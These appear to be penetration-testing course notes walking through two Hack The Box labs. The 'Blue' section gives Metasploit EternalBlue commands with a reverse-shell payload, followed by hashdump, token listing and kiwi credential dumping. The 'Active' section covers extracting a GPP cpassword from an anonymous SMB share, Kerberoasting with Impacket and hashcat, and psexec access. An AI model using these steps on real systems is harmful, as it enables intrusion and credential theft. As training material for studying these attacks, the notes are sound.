Week 10: MS17-010, GPP/cPasswords, and Kerberoasting

Blue

If you see SMB on a network, you should immediately check if it's vulnerable to MS17-010. This could take a service down, so you want to ask before running it.

nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump

meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print

#check if machine is dual-homed. if two NICs, can pivot
# e.g. if on 10.10.10.X and 10.10.11.X
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter

meterpreter > load incognito
meterpreter > list_tokens -u

meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list

Mimikatz is for 32 bit architecture and kiwi is for 64 bit architecture.

Active

A 'realistic' box. Likely a domain controller since it's running DNS, Kerberos, LDAP for Active Directory). Domain: active.htb. When there's SMB, check for anonymous login. See Group Policy Pwnage.

Enumeration

Likely a Domain Controller since it's running DNS, Kerberos, LDAP. Domain: active.htb. Common to domain controllers message signing is enabled and required for smb. Most of SMB and NTLM relay is done on machines other than Domain Controller since the functionality is usually turned off.

We could maybe dump ldap information, but we typically won't have access to that without credentials. 445 and 139 are very interesting because SMB is behind a lot of exploits.

Let's try to list out the contents of the smb directory.

Anonymous login is a finding. Absolutely list shares on a report. Let's see what we can connect to; the juiciest folders are C$ and ADMIN$.

We can connect to Replication and IPC$. Replication might be a backup of something. Let's mget everything in Replication.

Groups.xml is promising. Let's cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml.

Groups.xml is related to GPP (Group Policy Preferences). It allows Domain Admins to create Domain Policies using embedded credentials. We find: userName="active.htb\SVC_TGS" and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". SVC_TGS is the Ticket Granting Service. Groups.xml exists on some active domains, usually older ones. But, migrated ones may still have it. You can set one up as a honeypot though--a GPP that has never been used. As soon as credentials as used, you know there's a hacker on the network.

New creds - active.htb:GPPstillStandingStrong2k18. We could try to push the creds around with crackmapexec. We could try to login to SMB with this account. We could use psexec on this machine. Another tactic is Kerberoasting.

Kerberoasting

Kerberos: an authentication protocol using tickets to communicate and authenticate.

We have a server that is considered a KDC (Key Distribution Center). We also have another computer, the client. The client wants to authenticate, so it sends credentials and asks the server for a TGT (a ticket-granting ticket). KDC checks the creds and if they are good, sends back a secret key (encrypted by TGS) that's stored on the client until the ticket expires. There are also services (SQL, AntiVirus, etc) that the client might want to connect to. A service has a Service Principal Name (SPN). To connect as a client, we need to ask the KDC for permission. Client takes the ticket to KDC and asks to please connect to the service. With any valid ticket or TGT, we can request a TGS ticket for an SPN.

Impacket allows us to do this. Mine is located: /opt/impacket/examples/GetUserSPNs.py.

We can try to crack this offline with hashcat. Save the hash into a file.

Gaining Access

Now onto psexec.

Let's try exploit targets other than automatic.

Okay, got the meterpreter session open but meterpreter is x86 and the machine is x64. Let's try this again with a different payload.